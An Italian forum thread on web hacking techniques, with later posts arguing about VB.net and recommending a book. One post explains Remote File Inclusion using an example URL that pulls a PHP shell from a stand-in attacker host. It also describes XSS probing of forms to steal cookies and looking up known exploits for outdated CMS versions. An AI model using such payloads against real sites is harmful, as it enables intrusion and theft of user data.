Follow along with the video below to see how to install our site as a web app on your home screen.
Nota: This feature may not be available in some browsers.
scusate la formattazione, questo forum non ha alcun editor per l'invio dei messaggi :S
Aggiungo per le RFI che bisognerebbe aggiungere il punot di domanda:In pratica il Remote File Inclusion funziona solo grazie alle variabili non controllate, ad esempio: in una pagina PHP che include delle pagine dinamiche mediante delle variabili visibili:in questo codice è possibile includere qualsiasi cosa pur che parta da:esempio.it/?pagina=e quindi possiamo includere una php shell:esempio.it/?pagina=http://attaccante.tld/phpshell.txtMa è raro che un buon sito soffra degli RFI perchè infatti la vulnerabilità si risolve controllando ogni url con degli if, ifelse.. else..:if ($pagina == 1)include ('http://esempio.it/pagina1.php'); elseif ($pagina == 2)include ('http://esempio/pagina2.php'); else die('Errore 404'); Piu che RFI, parlerei dei Cross Site Script, XSS. Questa tipologia di attacco è molto frequente. Controllare una variabile è quasi ovvio ma spesso ci si dimentica di controllare l'input di un form.Per provare se il form di un sito è vulnerabile ai XSS basta inserire un frammento di codice, come questo: In caso si apre una finestra di alert con scritto "Vulnerabile ai XSS!" allora il sito è vulnerabile e quindi è possibile sfruttare questo errore di programmazione, per scovare cookie e ben altro.Tuttavia questi tipi di vulnerabilità vanno scoperti per tentativi. Prima di tutto, conoscere almeno il tipo di piattaforma del sito, se è un CMS come joomla, drupal wordpress.. o se è un forum come phpbb, ipb, vb.. se è possibile scoprire la versione della piattaforma e infine cercare tutti gli exploit noti per quella versione di quella piattaforma. Se non è aggiornata, si hanno molte probabilità di successo..Oppure, ci si puo affidare a scan di vulnerabilità come nikto, nessus... che effettueranno dei test provando a inviare piu di 10.000 richieste a file che hanno vulnerabilità conosciute, l'unico problema è che se il server del sito ha un firewall come mod_security, dopo qualche tentativo già si è bannati e quindi non si puo piu effettuare a pieno lo scan.è piu facile trovare delle vulnerabilità sulle piattaforme che su siti fatti da zero perchè la piattaforma è fatta da piu persone che non sono sempre allo stesso livello di competenze e i files e le funzioni della piattaforma sono moltissimi mentre un sito fatto da zero tende ad essere piu controllato perchè lo scopo finale sarà piu mirato.
che c'entra il vb.net nelle tecniche di hacking scusa?beh se è per questo il libro non cita niente o quasi sul vb.net....
quindi? questo non è un libro che tratta il vb lo ha accennato e bastama hai letto il libro prima di parlare? nelle prime pagine dice che "alcuni hacker usano anche linguaggi facili tipo vb.net" non continuo la frase...
se non sai di cosa si parla statene zitto
ma lol.... quindi uno non può neanche aiutarsi con vb.net perché te dici che non si può? mmm beh allora hai ragione!!! non mi degno nemmeno di risponderti cosi facendo non farei altro che accontentarti e provocare flame..... quindi ci si vede su inforge nabboquindi? questo non è un libro che tratta il vb lo ha accennato e basta
te lo consiglio, è un libro molto utile e spiega molte coseMolto interessante. Appena ho un attimo lo scarico e me lo leggo ^^